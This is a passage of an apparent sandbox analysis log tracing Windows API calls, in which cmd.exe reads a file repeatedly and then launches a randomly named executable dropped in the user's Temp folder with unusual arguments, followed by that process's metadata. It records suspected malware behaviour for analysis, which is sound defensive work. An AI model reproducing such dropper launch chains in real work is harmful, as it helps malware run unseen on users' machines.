0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.958] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.958] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.958] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.959] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.960] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.976] _close (_FileHandle=4) returned 0 [0092.977] FindNextFileW (in: hFindFile=0x250f60, lpFindFileData=0x16f550 | out: lpFindFileData=0x16f550) returned 0 [0092.977] GetLastError () returned 0x12 [0092.977] FindClose (in: hFindFile=0x250f60 | out: hFindFile=0x250f60) returned 1 [0092.977] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0092.981] _close (_FileHandle=3) returned 0 [0092.981] GetConsoleTitleW (in: lpConsoleTitle=0x16f9ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.981] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe\"")) returned 0xffffffff [0092.981] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0092.981] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0092.981] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0092.981] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0092.981] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0092.981] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0092.981] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0092.981] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0092.981] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0092.981] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0092.981] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0092.981] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0092.981] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0092.981] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0092.981] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0092.981] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0092.981] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0092.981] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0092.981] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0092.982] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0092.982] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0092.982] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0092.982] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0092.982] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0092.982] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0092.982] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0092.982] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0092.982] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0092.982] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0092.982] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0092.982] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0092.982] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0092.982] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0092.982] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0092.983] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0092.983] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0092.983] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0092.983] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0092.983] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0092.983] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0092.983] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0092.983] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0092.983] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0092.983] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0092.983] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0092.983] SetErrorMode (uMode=0x0) returned 0x0 [0092.983] SetErrorMode (uMode=0x1) returned 0x0 [0092.983] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x2604b0, lpFilePart=0x16f50c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp", lpFilePart=0x16f50c*="Temp") returned 0x23 [0092.983] SetErrorMode (uMode=0x0) returned 0x1 [0092.983] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\.") returned 1 [0092.983] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0092.986] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0092.986] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", fInfoLevelId=0x1, lpFindFileData=0x16f2a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f2a8) returned 0x262478 [0092.986] FindClose (in: hFindFile=0x262478 | out: hFindFile=0x262478) returned 1 [0092.987] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0092.987] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0092.987] GetConsoleTitleW (in: lpConsoleTitle=0x16f780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.987] InitializeProcThreadAttributeList (in: lpAttributeList=0x16f608, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16f6d0 | out: lpAttributeList=0x16f608, lpSize=0x16f6d0) returned 1 [0092.987] UpdateProcThreadAttribute (in: lpAttributeList=0x16f608, dwFlags=0x0, Attribute=0x60001, lpValue=0x16f6c8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16f608, lpPreviousValue=0x0) returned 1 [0092.987] GetStartupInfoW (in: lpStartupInfo=0x16f5c4 | out: lpStartupInfo=0x16f5c4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0092.987] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0092.988] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0092.988] lstrcmpW (lpString1="\\CNuu8Vyt.exe", lpString2="\\XCOPY.EXE") returned -1 [0092.989] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x16f664*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16f6b0 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessInformation=0x16f6b0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xac4, dwThreadId=0xac8)) returned 1 [0093.233] CloseHandle (hObject=0x4c) returned 1 [0093.233] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0093.233] GetEnvironmentStringsW () returned 0x262cf0* [0093.233] FreeEnvironmentStringsW (penv=0x262cf0) returned 1 [0093.233] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0093.974] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x16f5a4 | out: lpExitCode=0x16f5a4*=0x0) returned 1 [0093.974] CloseHandle (hObject=0x50) returned 1 [0093.974] _vsnwprintf (in: _Buffer=0x16f6ec, _BufferCount=0x13, _Format="%08X", _ArgList=0x16f5b0 | out: _Buffer="00000000") returned 8 [0093.974] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0093.974] GetEnvironmentStringsW () returned 0x262498* [0093.974] FreeEnvironmentStringsW (penv=0x262498) returned 1 [0093.975] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0093.975] GetEnvironmentStringsW () returned 0x262498* [0093.975] FreeEnvironmentStringsW (penv=0x262498) returned 1 [0093.975] DeleteProcThreadAttributeList (in: lpAttributeList=0x16f608 | out: lpAttributeList=0x16f608) [0093.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0093.975] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.975] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0093.975] SetConsoleInputExeNameW () returned 0x1 [0093.975] GetConsoleOutputCP () returned 0x1b5 [0093.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0093.975] SetThreadUILanguage (LangId=0x0) returned 0x409 [0093.975] exit (_Code=0) Process: id = "5" image_name = "cnuu8vyt.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe" page_root = "0x7ea16600" os_pid = "0xac4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xaac" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], 